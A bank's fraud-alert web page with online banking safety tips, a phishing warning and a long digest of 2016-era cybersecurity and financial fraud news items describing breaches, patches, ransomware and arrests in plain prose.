Fraud Alert Message Center
Tips for Safe Banking Over the Internet
As use of the Internet continues to expand, more banks are using the Web to offer products and services or otherwise enhance communications with customers.
The internet offers the potential for safe, convenient new ways shop for financial services and conduct banking business, any day, any time. However, safe banking online involves making good choices - decisions that will help you avoid costly surprises or even scams.
- Consumer Best Practices for Online Banking
- Business Best Practices for Online Banking
- Recommendations for Online Fraud Victims
- Recommendations for Mobile Phone Security
Current Online Threats
Please be aware of any email you receive from the following organizations FDIC, FFIEC, NACHA, EPCOR, Federal Reserve and the Better Business Bureau. None of these organizations should ever send you unsolicited emails regarding your bank or your bank accounts. If you receive an email purporting to be from any of the above organizations or other emails you are unsure about, do not open it. The email could potentially contain a virus or malware.
For more information regarding email and phishing scams, please visit: http://onguardonline.gov/
Online Shopping Tips for Consumers. Click Here for Information.
ATM and Gas pump skimming information. Click Here for Article.
Target Card Breach - A breach of credit and debit card data at discount retailer Target may have affected as many as 70 million shoppers. The Secret Service, which is charged with safeguarding the nation's financial infrastructure and payment systems, confirmed it was investigating the breach. Please be assured we are aware of the breach. As we receive additional information from Visa, we will notify any client whose card has potentially been compromised. Customers should monitor their account activity online if they have used their card at Target and report any fraudulent activity to the bank.
Bloods-linked gang members charged with running $414G identity-theft ring. Officials from the New York County District Attorney’s Office announced April 26 that 39 gang members were charged for their roles in a $414,000 identity theft scheme where the group used stolen bank information from the Dark Web to create phony credit cards used to make fraudulent purchases at Barneys and Sacks Fifth Avenue stores and sold the goods to fund personal expenses. Officials stated a subsequent search of the suspects’ apartments in Queens and Brooklyn, New York revealed computers and credit card making equipment, among other illicit materials.
Critical, high severity flaws patched in Firefox. Mozilla released its web browser, Firefox 46 that patched a total of 14 vulnerabilities including 4 critical vulnerabilities affecting the browser engine, which could cause crashes and potential arbitrary code execution, as well as a high severity vulnerability that could be exploited via specially crafted Web content and cause an exploitable crash, among other flaws.
Time for a patch: Six vulns fixed in NTP daemon. Security researchers from Cisco’s Talos Security Intelligence and Researcher Group discovered five vulnerabilities in Network Time Protocol daemon (ntpd) after its ongoing ntpd evaluation revealed attackers could craft User Datagram Protocol (UDP) packets to cause a denial-of-service (DoS) condition or prevent the correct time from being set, among other actions. The vulnerabilities were patched in Network Time Protocol (NTP) version 4.2.8p7.
Cisco finds backdoor installed on 12 million PCs. Cisco’s Talos Security Intelligence and Research Group reported that a Tuto4PC’s OneSoftPerDay application was discovered to install potentially unwanted programs (PUPs), harvest users’ personal information, and was considered to be a backdoor for 12 million personal computers (PCs) after an analysis revealed that an increase in generic trojans were found when about 7,00 unique samples displayed names including “Wizz” in some of the domains.
Over 7M Minecraft mobile credentials exposed after Lifeboat data breach. Lifeboat Networks reported April 27 that its network was compromised in January, exposing its users’ login names, passwords, and email addresses in the Minecraft Pocket Edition mobile game after a security researcher found over 7 million user credentials were available online. Lifeboat forced its customers to reset their passwords discretely and stated they started using stronger algorithms to guard user data.
Waze drivers can be tracked, network flooded with fake traffic. Six researchers from the University of California, University of Santa Barbara, and the Tsinghua University discovered that they could create fake traffic jams and track the movements of any Waze user by reverse engineering the Waze app communications protocol and creating Sybil attacks to insert thousands of malicious users inside the Waze networks. The attacks could manipulate the app’s behavior and allow attackers to pose as Waze users when communicating with the app’s Google server.
Attackers increasingly abuse open source security tools. Security researchers from Kaspersky Lab reported that the open source security tool, Browser Exploitation Framework (BeEF) was being leveraged by an advanced persistent threat (APT) group named NewsBeef to track and steal users’ browsing history from compromised Web sites through flaws in content management systems. In addition, researchers reported that other APT actors were using open source tools in their operations to execute malware across the globe.
Verizon 2016 DBIR: What you need to know. Verizon released its 2016 Data Breach Investigations Report (DBIR) which revealed current information technology (IT) trends and the overall cyberattack landscape after conducting an analysis on over 100,000 security incidents, which confirmed 2,260 data breaches occurred across 82 different countries in 2015, with the majority of breaches occurring due to human nature via phishing campaigns.
Feds break up money-laundering scheme linked to fraudulent Armenian passports. The U.S. District Court in Santa Ana unsealed charges the week of April 18 against 7 California residents for their roles in a $14 million identity theft and international money laundering scheme where the group filed approximately 7,000 fraudulent tax returns by using stolen identities to create fraudulent foreign passports from the Republic of Armenia, Georgia, and the Czech Republic in order to open numerous bank accounts and mailboxes, which were used to deposit and launder the refunds. Officials stated that a total of 10 people were involved in the fraud scheme that sought a total of $38 million in fraudulent tax returns.
DDoS aggression and the evolution of IoT risks. Neustar released its findings after conducting a survey on over 1,000 information technology (IT) professionals across 6 continents which revealed that 76 percent of companies are investing in distributed denial-of-service (DDoS) protection as DDoS attacks are continuing to evolve from single large attacks to multi-vector attacks. Forty-seven percent of attacked organizations were participating in information sharing on threats and counter measures to mitigate future assaults.
Information stealer “Fareit” abuses PowerShell. Security researchers from Trend Micro discovered a new variant of the Fareit malware was stealing login details, Bitcoin-related data, and other personal information from victims after the malware was delivered via spam emails and executed through two different tactics including Word documents and malicious macros, and PDF documents and Windows PowerShell. Attackers could use PDF files to execute PowerShell via the OpenAction event that allows Fareit to download onto a victim’s machine and collect information.
The Pirate Bay malvertising campaign pushes Cerber ransomware. Security researchers from Malwarebytes and RiskIQ reported that malicious ads on The Pirate Bay torrent portal were redirecting victims, using older Windows and Internet Explorer software to another Uniform Resource Identifier (URL) where the Magnitude exploit kit (EK) would leverage a Flash zero-day flaw to compromise vulnerable personal computers (PCs), install the Cerber ransomware, and install potentially unwanted software (PUP).
Miami woman had 371 counterfeit credit cards in luggage, police say. A Miami woman was arrested April 23 at Miami International Airport after authorities noticed suspicious masses in her luggage during a security checkpoint screening, prompting a secondary hand inspection of her suitcase which revealed 371 counterfeit credit cards. A subsequent search revealed two additional fraudulent credit cards in the woman’s wallet.
Facebook bug allowed attackers to take over accounts on other sites. Facebook patched a flaw in its account registration process after security researchers from Bitdefender discovered the flaw could allow attackers to take over users’ profiles on Web sites where the Facebook Social Login feature was available by adding an attacker’s email address as a secondary address, enabling the attacker to verify the profile and make modifications to the account information.
Malicious insiders could tap ransomware-as-a-service for profit. Security researchers from Imperva revealed that the ransom-as-a-service (RaaS) model could be leveraged by malicious attackers to exploit the organization’s unstructured data, locate sensitive data, and encrypt the company’s most valuable information after discovering that authors and distributors of the malware use anonymous Bitcoin addresses and the Tor network to ensure they receive their ransom money and stay undetected from law enforcement agencies.
Compromised credentials still to blame for many data breaches. A Cloud Security Alliance survey found that a lack of scalable identity access management systems, a lack of ongoing automated rotation of cryptographic keys, passwords, and certificates, as well as failure to use multifactor authentication were the major causes of data breaches. The findings also indicated that 22 percent of companies who suffered a data breach, attributed the breach to compromised credentials.
Critical flaws in HP Data Protector open servers to remote attacks. Hewlett Packard released security updates for its HP Data Protector software patching six critical vulnerabilities for all versions prior to 7.03_108, 8.15, and 9.06 which could allow a remote code execution flaw or unauthorized disclosure of information via unauthenticated users or through an embedded Secure Sockets Layer (SSL) private key, which could increase the chance of man-in-the-middle (MitM) attacks.
Attacker friendly hosting firm leveraged by Pawn Storm hackers. Security researchers from Micro Trend reported that the Pawn Storm Group was abusing a small Virtual Private Server (VPS) registered in United Arab Emirates (UAE) to attack governments in 80 counties including Bulgaria, Greece, Malaysia, Ukraine, and the U.S., and were seen executing more than 100 cyber-attacks within the past year. In addition, it was discovered that the group used the VPS hosting provider for command & control (C&C) servers, exploit sites, spear-phishing campaigns, domestic espionage in Russia, and Web mail phishing sites targeting high-profile users.
Adobe patches flaw in analytics AppMeasurement for Flash Library. Adobe release its Analytics AppMeasurement for Flash library version 4.0.1 which patched a Document Object Model (DOM)-based cross-site scripting (XSS) vulnerability after a security researcher discovered the vulnerability when the debugTracking feature was enabled. The flaw affects version 4.0 and earlier platforms.
Law enforcement, government agencies see phishing as main cyber risk. The Global Cyber Alliance (GCA), a group of government representatives from the U.S. and the United Kingdom, agreed to promote the usage of Domain-based Message Authentication, Reporting & Conformance (DMARC) protocol to make it more difficult for attackers to tamper with original documents as phishing attacks were ranked as the top cyber threat following research that revealed spear-phishing campaigns increased by 55 percent from 2015.
DDoS attacks continue to rise in power and sophistication. Imperva released its Global DDoS Threat Landscape Q1 2016 report which revealed that distributed denial of service (DDoS) attacks were more advanced and sophisticated after an analysis revealed that attackers increased the use of browser-like DDoS bots with capabilities of bypassing security challenges by 36.6 percent and attackers were seen executing new ways to perform application layer assaults including Hypertext Transfer Protocol Secure (HTTPS) POST flood.
Man arrested in Tenn. accused of skimming 1,800 credit cards. Officials reported April 20 that a man was arrested and charged with criminal simulation April 7 after police found thousands of merchandise in the culprits’ vehicle along with the stolen identity of 150 people during a traffic stop violation. Investigators reported that the man stole the credit card data of 1,800 people across several States by secretly installing a skimming device on gas pump stations.
“FIN6” cybergang steals millions of cards from PoS systems. FireEye reported that the cybercriminal group, dubbed “FIN6” which has been targeting thousands of retail and hospitality Point-of-Sale (PoS) systems was increasing its revenue by stealing millions of credit card information and selling the information on an underground market, as well as possessing valid credentials for each of the target’s companies’ networks. Researchers were unsure how each attacker compromises a system due to the lack of forensic evidence.
Cisco patches severe flaws in Wireless LAN controller. Cisco released software updates for its Wireless LAN Controller (WLC) products which patch several critical flaws and high severity denial-of-service (DoS) vulnerabilities including an issue related to the Hypertext Transfer Protocol (HTTP) Universal Resource Language (URL) redirection feature of WLC software that can allow an unauthenticated attacker to remotely trigger a buffer overflow and cause affected devices to enter a DoS condition.
New tool aims to generically detect Mac OS X ransomware. Security researcher from Synack developed a tool, named “RansomWhere?” that will detect and block all types of file-encrypting ransomware on Apple Mac OS X systems with the aim to constantly monitor file systems for the creation of encrypted files by suspicious processes. The tool was developed after researchers received several reports of ransomware targeting Mac OS X users within the past year.
3 wanted in Gaston Co. skimming case. Gastonia Police reported April 19 that they were searching for 3 suspects believed to be involved in 21 fraud cases after the trio installed skimming devices in Gaston County gas stations and stole customer’s debit card information and personal identification numbers (PINs).
SEC announces financial fraud cases. The U.S. Securities and Exchange Commission (SEC) reported April 19 that Logitech International agreed to pay over $7.5 million in Federal penalties for allegations that the company inflated its 2011 financial records to meet its earning guidance during a 5-year period and that 4 of its executives violated Logitech’s warranty accrual accounting, minimized the write-downs of millions of dollars of excess component parts, and failed to remunerate an earlier acquisition. The SEC also stated that 3 former executives at Ener1, Inc., agreed to pay a total of $180,000 in penalties after the trio overstated revenues and assets in 2010 and overstated assets in the first quarter of 2011.
New PWOBot Python malware can log keystrokes, mine for bitcoin. Security researchers from Palo Alto Networks discovered a new malware family dubbed PWOBot was encoded in Python and PWOBot modules can execute other binaries, launch an Hypertext Transfer Protocol (HTTP) server, log keystrokes, execute custom Python code, query remote Universal Resource Languages (URLs), as well as mine for bitcoins by using the victim’s central processing unit (CPU) or graphics processing unit (GPU).
Oracle patches 138 bugs, 9 in Java, 31 in MySQL. Oracle released patches addressing 136 security issues, of which 9 were considered critical flaws, in 49 different product suites including Oracle Database, Java, MySQL, Solaris, Berkeley Database, and VirtualBox, among other products. Users were advised to update their software to the latest versions.
Security firm discovers secret plan to hack numerous websites and forums. Security researchers from SurfWatch Labs reported that they prevented a new trojan named Thanatos, from potentially infecting thousands of Invision Power Services (IPS) servers after researchers scanned the Dark Web and discovered attackers were planning to exploit a vulnerability in the infrastructure of IPS by accessing the Web sites of IPS’ customers and adding an exploit kit on each page. IPS was informed of the attacker’s scheme and shut down all its access points.
Kaspersky announces antivirus for Industrial Control Systems (ICS). Kaspersky launched a new cyber-security tool, named Industrial CyberSecurity, which will help Industrial Control Systems/Supervisory Control And Data Acquisition (ICS/SCADA) equipment become more resilient against cyberattacks and will prevent attackers from damaging railway systems, nuclear power plants, oil and gas companies, and various other SCADA equipment by including an “observability mode” which will alert operators of cyberattacks, personnel faults, and anomalies inside an industrial network, among other features.
Pro-ISIS group defaces 88 websites in three-day rampage. A hacking group titled, Team System Dz reportedly hacked and defaced 88 Web sites from France, Israel, the U.K, and the U.S. April 14 – April 16, leaving pro-Islamic State messages on each compromised Web page, many of which were running WordPress systems.
Google analyzes effectiveness of website hack notifications. Google and the University of California, Berkeley released a study revealing that nearly 60 percent of hijacking incidences were resolved by Webmasters over an 11-month period with about 22 percent of Search Quality Web sites and 6 percent of Safe Browsing Web sites reinfected within 1 month. Google advised Webmasters to sign up for Google’s Search Console to ensure they are notified when their Web sites become compromised.
New CryptXXX ransomware locks your files, steals bitcoin and local passwords. Security researchers from Proofpoint discovered the CryptXXX ransomware had an infostealer component and could harvest information and credentials about a user’s local instant messenger clients, email clients, FTP clients, and Internet browser information, as well as steal bitcoins after finding that the CryptXXX ransomware was similar to an older Reveton ransomware and allegedly created by the authors of the Angler exploit kit (EK).
Ransomware uses blockchains to transmit decryption keys. Researchers from Sucuri discovered that ransomware developers were using blockchains to deliver decryption keys to victims infected with ransomware, after discovering that the usage of blockchains to transmit decryption keys is much more reliable for attackers than using payment gates and third-party compromised Web sites, ensuring that the entire transaction process is public and transparent while hiding attackers’ real Internet Protocols (IPs) addresses.
Valencia man pleads guilty to fraud in $20 million precious metal investment scam. The U.S. Attorney’s Office charged the owner of Superior Gold Group, LLC., and Superior Equity Group, LLC., for 4 counts of wire fraud, 5 counts of wire fraud, and 2 counts of money laundering as a part of a $20 million metal investment scam April 15 after the man defrauded more than 300 investors by failing to disclose material information to investors pertaining to the delivery of precious metals and cost investors to lose nearly $11 million while the man used the investors’ money for personal expenditures from October 2007 – December 2010.
SEC charges litigation marketing company with bilking retirees. The U.S. Security and Exchange Commission charged Los Angeles-based Prometheus Law and its two co-founders with conducting a Ponzi-like scheme April 15 after the duo raised $11.7 million from about 250 investors and retirees, promising investors that the funds would be allocated for marketing and advertising purposes to locate plaintiffs for class-action lawsuits, but instead the two diverted about $5.6 million for their personal use while failing to deliver the promised 100 to 300 percent returns to investors.
3.2 million devices exposed to ransomware attacks: Cisco. Security researchers from Cisco Talos discovered that approximately 3.2 million computers were vulnerable to file-encrypting ransomware due to out-of-date software after an Internet scan on already compromised devices revealed that more than 2,100 backdoors across 1,600 Internet Protocol (IP) addresses were associated with governments, schools, aviation companies, and other organizations. Cisco advised administrators to disable external access to infected machine to keep attackers away.
C99 webshell increasingly used in WordPress attacks. IBM Security reported that there was a 45 percent increase in attacks using a variant of the PHP webshell dubbed, C99 in WordPress Web sites after IBM identified nearly 1,000 attacks in February and March.
Flaws found in Accuenergy, Ecava ICS products. The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) released advisories detailing several flaws in its ICS products from Accuenergy Corporation, Ecava, and Sierra Wireless Company including an authentication bypass issue in Acuvim II and Acuvim IIR products, a security issue in Accuenergy devices, and an information disclosure vulnerability in Sierra’s Wireless ACEmanager product, among other vulnerabilities.
New USB-C standard can help fight USB malware. The USB Implementers Forum (USB-IF) reported that it created a new standard titled, USB Type-C Authentication that will help protect USB-C capable devise from low-end USB chargers that may inflict damage to a user’s device and will help prevent USB malwares from infecting a device as the USB-C Authentication only sends data to a device that adheres to the strict USB-C specifications.
Decrypter available for AutoLocky, Locky ransomware copycat. A security researcher from Emsisoft developed a decrytper for a new ransomware named AutoLocky, a variant of the Locky ransomware, which can encrypt a victim’s file by tricking a victim into accessing a malicious link created inside the Start Menu StartUp folder named “Start.Ink.” The decrypter was discovered after researchers found a flaw in the ransomware.
VMware patches critical vulnerability. VMware released updates for several of its products including a patch for a critical vulnerability in its Client Integration Plugin (CIP) that could have allowed an attacker to execute a man-in-the-middle (MitM) attack or session hijacking attack by tricking a vSphere Web client user to visit a specially crafted Web site. VMware advised its customers to update all programs to patch the flaw.
Western Digital user data exposed by DNS issue. A security researcher discovered that a Western Digital (WD) nameserver, supporting the company’s My Cloud NAS products, was not configured properly and posed a Domain Name System (DNS) flaw that could have been exploited by an attacker to conduct a zone transfer and gain access to a zone file, which can contain valuable user data for attackers to exploit a zero-day vulnerability in the products. WD corrected the faulty configuration after scanning all its servers and reviewing all the architecture and processes in place for modifying the configuration of nameservers.
SEC case freezes assets of ski resort steeped in fraudulent EB-5 offerings. The U.S. Securities and Exchange Commission charged two owners of Jay Peak Inc., and its eight business partners for conducting a Ponzi-like fraud scheme April 14 after the group misused more than $350,000 million, which was raised through investments and solicited under the EB-5 Immigrant Investor Program by using the funds for personal expenses and other-than-stated purposes while omitting key information and making false statements to investors in an effort to construct ski resort facilities and a biomedical research facility in Vermont.
9 charged in alleged San Jose car insurance fraud ring. The Santa Clara County District Attorney’s Office reported April 13 that a San Jose body shop manager, his girlfriend, and seven other body shop owners were charged with insurance fraud after the group allegedly made more than $140,000 by filing false insurance claims following the group’s fabrication of over 20 vehicle accidents listed under counterfeit names from 2011 – 2015. The group purchased the insurance policies days before each incident and purposely damaged each car to file claims to several insurance company.
Hybrid trojan “GozNym” targets North American banks. Researchers from IBM Security discovered a hybrid trojan, dubbed “GozNym,” which was reported to be similar to the Nymaim dropper and the Gozi financial malware, leverages Nymaim dropper’s stealth and persistence while adding trojan capabilities from Gozi’s ISFB parts to facilitate fraud via infected Internet browsers. The trojan is believed to have stolen millions of dollars from victims, targeting 22 financial institutions in the U.S. and Canada including banks, credit unions, e-commerce platforms, and retail banking.
No patches for QuickTime Flaws as Apple ends support on Windows. ZDI reported that Apple will no longer release security updates for Window versions of QuickTime after a security researcher from Source Incite found a heap corruption vulnerability that could allow an attacker to exploit the flaw for remote code execution (RCE) once a victim accesses a maliciously crafted Web site or file. Apple released instructions on ways to remove QuickTime for Window users and advised users to remove legacy plugins to enhance their personal computer (PC) security.
Google, Microsoft address problems in their URL shorteners. An independent security researcher and a professor at Cornell Tech discovered that many Universal Resource Language (URL) shortening services used by Google and Microsoft, employ short random character tokens that can allow an attacker to infiltrate potential private files holding sensitive information using brute-force attacks. The researchers found the flaw after beginning a series of automated scans on Microsoft’s 1drv.com and found it exceptionally easy to brute-force its small 6-character URLs.
Clever techniques help malware evade AV engines. Security researchers from FireEye released a study titled, Ghost in the Endpoint which revealed that various components of malware went undetected for an extended period of time by antivirus programs including a backdoor dubbed “GOODTIMES,” which was left undetected due to its disguise as an Excel file (XLSX) while leveraging a Flash Player exploit.
Lizzard Squad downs Blizzard servers with massive DDoS attacks. A Blizzard spokesman reported that its European and U.S. servers that host games such as World of Warcraft, Diablo 3, and Starcraft 2 experienced connectivity and latency issues for several hours April 14 following an potential denial of service (DDoS) attack allegedly conducted by Lizard Squad hacking group. Blizzard technical support was working to mitigate the impact of the attacks.
Microsoft issues optional Windows update to fix MouseJack vulnerability. Microsoft released its monthly security updates addressing several vulnerabilities including a flaw dubbed, MouseJack after security researchers from Bastille found an attacker could spoof data from a wireless device and force the Universal Serial Bus (USB) dongle to send fraudulent instructions to the connected personal computer (PC) and execute malicious actions.
Adobe patches flaws in Creative Cloud, RoboHelp. Adobe released Creative Cloud version 184.108.40.206, which patched an important vulnerability in the sync process that affected Creative Cloud Libraries version 220.127.116.11 and earlier versions, as well as a security hotfix for RoboHelp Server version 9, which patched a critical vulnerability linked to the Structured Query Language (SQL) queries that could lead to information disclosure, among other patched vulnerabilities.
Another IBM Java patch bypassed by researchers. Researchers from Security Explorations discovered that IBM’s patch for Java’s “issue 70” was inefficient and could be easily bypassed and exploited for a complete sandbox escape flaw against Java versions 7 and 8 after the patches did not address the root causes of the vulnerabilities or introduce security checks into the code. Security Explorations published a report advising how IBM’s patch can be bypassed and released a Proof-of-Concept (PoC) code for the flaw.
Links found between different ransomware families. Researchers from AlienVault released a report addressing several similarities between PowerWare and PoshCoder ransomware including the use of the RijndaelManaged class and that both ransomware encrypt the same file types, which suggests that the two threats are connected. In addition, the report stated several similarities between Rokku and Chimera ransomware including the use of the ReflectiveLoader function, which is used in both ransomware for reflective dynamic link library (DLL) injection to load a library from memory into a host process.
Over half a billion personal records were stolen or lost in 2015. Symantec Corporation released a report which stated that in 2015 many companies avoided disclosing the full details of their data breaches after researchers found that over 429 million records were lost or stolen and that data breaches grew by 85 percent compared to data breaches in 2014. In addition, the report stated that 75 percent of popular Web sites had major vulnerabilities; of which, 15 percent were considered as critical flaws.
Improved Qbot worm targets public institutions. Researchers from BAE Systems discovered that an improved version of the Qbot malware was targeting public organizations such as police departments, hospitals, and universities after finding that the malware’s developers had made several improvements to avoid detection and that more than 54,000 international machines were part of the botnet, with 85 percent of infections listed in the U.S. Researchers noted that cyber attackers distributed the Qbot malware via compromised Web sites that lead to the RIG exploit kit (EK).
Goldman Sachs agrees to pay more than $5 billion in connection with its sale of residential mortgage backed securities. The U.S. Department of Justice announced April 11 that Goldman Sachs Group, Inc., agreed to pay a total of $5.06 billion to settle charges related to the firm’s conduct in the packaging, securitization, marketing, sale, and issuance of residential mortgage-backed securities from 2005-2007 after the firm falsely assured prospective investors that the securities it sold were backed by sound mortgages, thereby causing billions of dollars in losses to financial institutions. As part of the settlement, Goldman Sachs must pay a civil penalty, provide monetary relief to homeowners and distressed borrowers, and pay a fine to settle claims with other Federal and State entities, among other requirements.
Wells Fargo admits deception in $1.2 billion U.S. mortgage accord. The U .S. Department of Justice announced April 8 that it reached a $1.2 billion settlement with Wells Fargo & Company and resolved claims with a former vice president after the bank admitted to falsely certifying that many of its home loans qualified for Federal Housing Administration insurance from 2001-2008, and failing to file timely reports on several thousand loans with material defects from 2002-2010. The agreement also resolved claims by Federal prosecutors in California that Wells Fargo-owned American Mortgage Network, LLC allegedly issued false loan certifications.
Ramdo Click-Fraud malware continues to evolve. Security researchers from Dell SecureWorks and Palo Alto Networks released an analysis on the Ramdo click-fraud malware, also known as Redyms, which stated that the Ramdo malware was capable of downloading and installing additional malicious software on infected devices after it tricks users into selecting an online ad from other infection systems. The report stated that while the malware was not very sophisticated, its operators were actively working on implementing new features and methods to avoid detection and prevent analysis.
WordPress.com pushes free HTTPS to all hosted sites. WordPress reported that it will host all free Hypertext Transfer Protocol Secure (HTTPS) traffic for all custom domains including blogs and Web sites which will ensure users are provided with only secured, HTTPS traffic.
Malware found in IoT cameras sold by Amazon. The co-founder of Proctorio discovered that a set of security cameras sold from Amazon.com, Inc., were infected with malware after finding that an iframe, brenz_pl/rc/, was linked to a malicious Web site when connecting to a personal computer that could potentially allow attackers remote control, remote access, and to control components in a targets’ home.
“ID Ransomware” website helps identify ransomware infections. An independent security researcher launched a new Web site named ID Ransomware that will help ransomware victims recover their encrypted files without paying the ransomware fee by allowing users to upload their encrypted files to the Web site where a thorough analysis will be conducted to notify victims which ransomware variant has locked their computers or files. Once the Web site detects the ransomware type, users will receive a link to download a decrypter to unlock encrypted files.
Jigsaw ransomware threatens to delete your files, free decrypter available. Security researchers from @MalwareHunterTeam discovered a new ransomware dubbed Jigsaw was infecting computers with an unknown infection method and threatening victims to pay the ransomware fee by targeting 226 different file types, encrypting each file with an Advanced Encryption Standard (AES) algorithm, and adding the .fun extension at the end of each file name. Researchers advised victims to download the JigSawDecrypter to decrypt locked files.
Google improves safe browsing for Network Admins. Google reported that it made improvements to its Safe Browsing Alerts for Network Administrators service that will inform administrators about Universal Resource Language (URL) related to malicious software, potentially unwanted programs (PUPs), and social engineering, as well as inform users about compromised pages on their networks that can allegedly harm users via drive-by downloads or exploits.
Petya ransomware unlocked, you can now recover password needed for decryption. Two security researchers discovered ways to help victims of the Petya ransomware retrieve locked files and unlock computers after one researcher created two Web sites where victims can obtain the decryption password, and another researcher from Emsisoft created a tool that can help generate passwords needed to unlock victims’ computers.
Nuclear exploit kit uses Tor to download payload. Researchers from Cisco discovered that the Nuclear exploit kit (EK) was dropping a Tor client file, named “tor.exe”, for Microsoft Windows to execute a request via the Tor anonymity network to download a secondary payload as several domains listed in the network traffic of the Nuclear exploit kit (EK) were never registered and were not associated with any Domain Name System (DNS) traffic. Researchers noted that as attackers used Tor to download a second payload, the malware was more difficult to track back to its hosting system.
CryptoHost ransomware locks your data in a password-protected RAR file. Security researchers from MalwareForMe, MalwareHunterTeam, Bleeping Computer, and an independent researcher discovered a way to recover RAR files locked by the CryptoHost ransomware after an analysis of the ransomware revealed it was using a combination of the users’ ID number, motherboard serial number, and the C:\ volume serial number to generate a secure hash algorithm (SHA) 1 hash, which was used to give the RAR file’s name and the file’s password. Researchers stated victims will need to open the Windows Task Manager, find the cryptohost.exe process, stop its execution, and unzip the RAR file.
Cisco releases critical security updates. Cisco released six security advisories including a high impact vulnerability in the Web application programming interface (API) of the Cisco Prime Infrastructure and Evolved Programmable Network Manager (EPNM) that could allow an attacker to send a crafted Uniform Resource Language (URL) request to bypass role-based access control (RBAC) and gain elevated privileges, as well as a vulnerability in the TelePresence Server that that could allow an attacker to cause a kernel panic and reboot the device, among other vulnerabilities.
Vacaville police seize 170 fake credit cards in ID theft bust. A San Francisco resident was arrested April 4 after police found 170 fraudulent cards under 7 different names, $600 in cash, and several drivers’ licenses in the suspect’s possession when he was apprehended for making more than $2,000 in fraudulent purchases at the Vacaville Premium Outlets. An investigation into the extent of the fraudulent activity is ongoing.
Florida man suspected of $200k in fraudulent purchases across U.S. arrested in Missoula. A Florida resident suspected of using counterfeit credit cards to make $200,000 worth of fraudulent purchases at stores in over 20 States was arrested in Missoula, Montana, April 4 after a loss prevention officer at the Sportsman’s Warehouse alerted police that the suspect was in the store. A search of the suspect reportedly revealed 13 credit cards and the investigation is ongoing.
22 face charges in Miami drug money-laundering ring involving ‘El Chapo’ cartel. Miami-Dade authorities announced arrest warrants April 7 for 22 people who are suspected of laundering around $1 million in illegal drug profits each month through nearly a dozen Miami businesses prior to sending the money to Colombia. The arrests are part of “Operation Neymar,” a 2-year investigation run by DHS, Miami police, and Florida State prosecutors that probes into the black market peso exchange and monitors deals in 17 countries.
Miami couple charged with $2 million identity theft fraud, authorities say. The Manhattan District Attorney’s office announced April 5 charges against a Miami couple for allegedly running a $2 million credit card fraud and identity theft scheme where the duo and co-conspirators stole personal information from over 40 victims to open credit cards, which they had shipped to locations all over the U.S. Authorities found dozens of credit cards under different names, forged identification and licenses, and a credit card encoder, among other illicit materials at multiple Miami addresses associated with the couple.
Ubuntu patches several kernel vulnerabilities. Ubuntu released patches addressing several vulnerabilities in the Linux kernel and various Ubuntu 14 and 15 variants including a use-after-free flaw that can be exploited by a local attacker to crash a system and potentially execute arbitrary code, a timing side channel vulnerability that can be exploited by an attacker to disrupt the integrity of the system, and a denial-of-service (DoS) vulnerability that could allow an unauthenticated attacker to exhaust resources and force a DoS condition, among other flaws.
Adobe patches flash zero-day exploited by Magnitude EK. Adobe released an update for its Flash Player products that patched a zero-day vulnerability, specifically a memory corruption flaw that can be exploited for remote code execution, after a security researcher from Proofpoint found changes in the Magnitude exploit kit (EK); and upon further investigation, discovered attackers were delivering various threats such as Cerber and Locky ransomware via the Magnitude EK.
Authorities shut down botnet of 4,000 Linux servers used to send spam. ESET reported that a joint effort with CyS Centrum LLC and the Cyber Police of Ukraine helped shut down the six-year-old Mumblehard botnet after researchers pinpointed the location of the true command and control (C&C) server when Mumblehard operators began making changes to their malware’s code. Authorities seized the Internet Protocol (IT) of the server and transferred it to a security firm who is running a server that is cancelling all requests made by Mumblehard’s botnets.
Police: 3 people arrested for credit card scam, over 250 counterfeit credit/debit cards found. Two California men and a New Jersey woman were arrested and charged April 4 in Nashua, New Hampshire, after authorities found over 250 counterfeit credit and debit cards, more than 20 gift cards, and receipts originating from North Carolina in the trio’s vehicle. A subsequent search of the group’s two hotel rooms in Tewksbury, Massachusetts, revealed a laptop computer, a card reader and coder, a box of blank cards, and a large quantity of gift cards.
Google reCAPTCHA cracked in new automated attack. Three security researchers developed a new automated attack that can bypass Google’s reCAPTCHA system and Facebook’s CAPTCHAS systems’ security measures and machine learning after solving the systems’ image answers security protocol with a 70.78 percent success rate when conducting studies on 2,235 CAPTCHAs. The new attack proved a higher degree of accuracy than previously reported and could potentially allow malicious hackers to conduct the same attack.
OSVDB shut down permanently. Leaders of the Open Sourced Vulnerability Database (OSVDB) reported that its database will be shut down permanently due to the lack of support and contribution from the Information Technology (IT) industry. The project’s blog will remain active to help provide commentary on items related to the vulnerability world.
Police raids target cyber-criminals in four countries: Germany. Approximately 700 international police officers participated in coordinated multi-national raids in the Netherlands, France, Canada, and Germany to arrest globally active hackers and a variety of Internet criminals that offered illicit services such as disguising malware from anti-virus programs to steal online passwords and banking information, among other actions. Officials reported that they arrested a chief suspect and confiscated about 300 computers and disks.
Vulnerabilities continue to plague industrial control systems. The DHS Industrial Control Systems-Computer Emergency Readiness Team (ICS-CERT) released three security advisories on industrial control systems (ICS) that detailed vulnerabilities originally found and reported by independent researchers. The advisories indicated that critical infrastructure and industrial networks were still inundated with serious flaws.
Hackers will break into email, social media accounts for just $129. Dell SecureWorks released a report which revealed that the underground hacker market, a virtual space for those interested in hiring a hacker to compromise a Gmail, Hotmail, or Yahoo account, only required customers to pay $129 for hacking personal email services and required customers to pay $500 to compromise corporate email accounts. In addition, the report stated the underground market offered a plethora of hacking services to buying customers including services to hack the commercial facilities sector, the transportation sector, and the financial sector, among others.
Minister convicted in $5 million tax scam. A traveling minister from Arkansas was convicted April 5 for his role in a nearly $5 million fraudulent tax return scheme where he and a co-conspirator allegedly filed over 2,700 fraudulent tax returns on behalf of church members in Ohio and other States after obtaining church members’ personal information by claiming to help the members procure government stimulus funds. The minister and co-conspirator took fees from each tax refund while congregants received the balance.
Serial ‘bandage’ bank bandit. The FBI announced a search April 5 for a bank robber dubbed the “Bandage” who robbed a Sandy Spring Bank branch in Burtonsville and a Capital One Bank branch in Elkridge April 1. Authorities stated that the man is suspected of robbing seven other banks in Maryland since October 2015.
Windows’ Pirrit adware ported to OS X via Qt Framework. Security researcher from Cybereason discovered that the OSX/Pirrit adware was infecting Apple Mac users for the first time and hijacking users’ Web traffic with several ads via the Qt Framework, which allows programmers to write applications that work on Apple Mac devices, Linux systems, and Microsoft Window devices. The malware was seen using several steps to infiltrate a system after a user launches a Pirrit-laced binary.
